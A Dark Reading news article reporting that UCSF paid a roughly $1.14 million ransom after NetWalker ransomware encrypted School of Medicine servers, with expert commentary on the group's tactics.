Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Attacks/Breaches

6/29/2020
05:30 PM
100%
0%

University of California SF Pays Ransom After Medical Servers Hit

As one of at least three universities hit in June, the school paid $1.14 million to cybercriminals following an attack on "several IT systems" in the UCSF School of Medicine.

The University of California San Francisco paid about $1.14 million to ransomware operators earlier this month after its malware compromised several important servers in the UCSF School of Medicine and encrypted them to prevent access, UCSF administrators stated on June 26.

The crypto-ransomware attacks, which have been attributed to the NetWalker group, also reportedly hit Michigan State University and Columbia College of Chicago. UCSF, which has pursued a substantial amount of research on coronavirus and COVID-19, stated that the attacks had not affected that research, nor had an impact on the operations of its medical center and patient care.

However, the ransomware had affected "a limited number of servers" in the medical school, the university said in a statement.

"The data that was encrypted is important to some of the academic work we pursue as a university serving the public good," the statement said. "We therefore made the difficult decision to pay some portion of the ransom, approximately $1.14 million, to the individuals behind the malware attack in exchange for a tool to unlock the encrypted data and the return of the data they obtained."

UCSF's information technology department caught the attack in progress and "quarantined several IT systems within the School of Medicine as a safety measure," preventing the attack from reaching the "core UCSF network," the university said in the June 26 statement.

The attack and its million-dollar consequences show that organizations must be able to recognize attacks and stop them much quicker, says Marcus Fowler, director of strategic threat at Darktrace, a threat protection firm.

"I think with ransomware, speed and visibility is going to be the key," he says. "They are running around and unplugging machines to manage the bleeding, rather than focusing on what happened."

NetWalker started attacking organization in 2019, focusing on large, global entities, according to cybersecurity firm SentinelOne. The group uses many generic system tools and tends to focus on so-called "living off the land" tactics, where the attackers try to only use utilities already present on the system to avoid being detected when installing malware, Jim Walter, a senior threat researcher at SentinelOne, wrote in a blog post on the group.

In February, the group attacked the Toll Group, an Australian shipping and logistics firm, causing disruptions to the company's operations and customers, according to media reports. In March 2020, the NetWalker group infected multiple hospitals in Spain, luring victims into opening malicious PDF documents that promised updated information on COVID-19. The latter incident, along with the attack on UCSF, highlights that cybercriminal groups — which had pledged to refrain from attacking hospitals and medical-research facilities during the coronavirus pandemic — cannot be trusted to forgo profits.

NetWalker, in particular, appears to be attacking with abandon — and leaking data, if the organization does not pay, Walter says.

"Consequently, detection and clean-up is no longer sufficient to ensure organizational data remains confidential and secure," he wrote in the blog post. "Prevention is the only the cure for threats like NetWalker, which hit organizations with the double-edged sword of encryption by ransomware and extortion via threats of public data exposure."

BBC News managed to get a fly-on-the-wall view of the negotiation between UCSF and the NetWalker criminal group — a negotiation that started at $3 million. After some back and forth, the two parties negotiated to 116.4 Bitcoins, or $1.14 million, which the school paid.

The school notified the FBI and are cooperating with their investigation. The university does not believe that any sensitive medical information had been exposed by the attack.

"Our investigation is ongoing but, at this time, we believe that the malware encrypted our servers opportunistically, with no particular area being targeted," USCF stated in its statement. "The attackers obtained some data as proof of their action, to use in their demand for a ransom payment."

The school declined to offer additional details, citing the ongoing federal investigation.

"In order to preserve the integrity of the investigation, we are limited in what we can share at this time and appreciate everyone's patience as we resolve this situation," UCSF said in its June 17 statement.

Related Content:

 
 
 
 
Learn from industry experts in a setting that is conducive to interaction and conversation about how to prepare for that "really bad day" in cybersecurity. Click for more information and to register for this On-Demand event. 
 
Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline ... View Full Bio
 

Recommended Reading:

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
RyanSepe
50%
50%
RyanSepe,
User Rank: Ninja
6/30/2020 | 11:01:20 PM
Facepalm
How many healthcare shops need to be burnt by the stove before they put in an effective backup process to prevent these types of incidents. Honestly at this point its just negligence.
Why Vulnerable Code Is Shipped Knowingly
Chris Eng, Chief Research Officer, Veracode,  11/30/2020
Inside North Korea's Rapid Evolution to Cyber Superpower
Kelly Sheridan, Staff Editor, Dark Reading,  12/1/2020
Register for Dark Reading Newsletters
White Papers
Video
Cartoon Contest
Current Issue
2021 Top Enterprise IT Trends
We've identified the key trends that are poised to impact the IT landscape in 2021. Find out why they're important and how they will affect you today!
Flash Poll
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2020-29565
PUBLISHED: 2020-12-04
An issue was discovered in OpenStack Horizon before 15.3.2, 16.x before 16.2.1, 17.x and 18.x before 18.3.3, 18.4.x, and 18.5.x. There is a lack of validation of the "next" parameter, which would allow someone to supply a malicious URL in Horizon that can cause an automatic redirect to the...
CVE-2020-5675
PUBLISHED: 2020-12-04
Out-of-bounds read issue in GT21 model of GOT2000 series (GT2107-WTBD all versions, GT2107-WTSD all versions, GT2104-RTBD all versions, GT2104-PMBD all versions, and GT2103-PMBD all versions), GS21 model of GOT series (GS2110-WTBD all versions and GS2107-WTBD all versions), and Tension Controller LE...
CVE-2020-29562
PUBLISHED: 2020-12-04
The iconv function in the GNU C Library (aka glibc or libc6) 2.30 to 2.32, when converting UCS4 text containing an irreversible character, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.
CVE-2020-28916
PUBLISHED: 2020-12-04
hw/net/e1000e_core.c in QEMU 5.0.0 has an infinite loop via an RX descriptor with a NULL buffer address.
CVE-2020-29561
PUBLISHED: 2020-12-04
An issue was discovered in SonicBOOM riscv-boom 3.0.0. For LR, it does not avoid acquiring a reservation in the case where a load translates successfully but still generates an exception.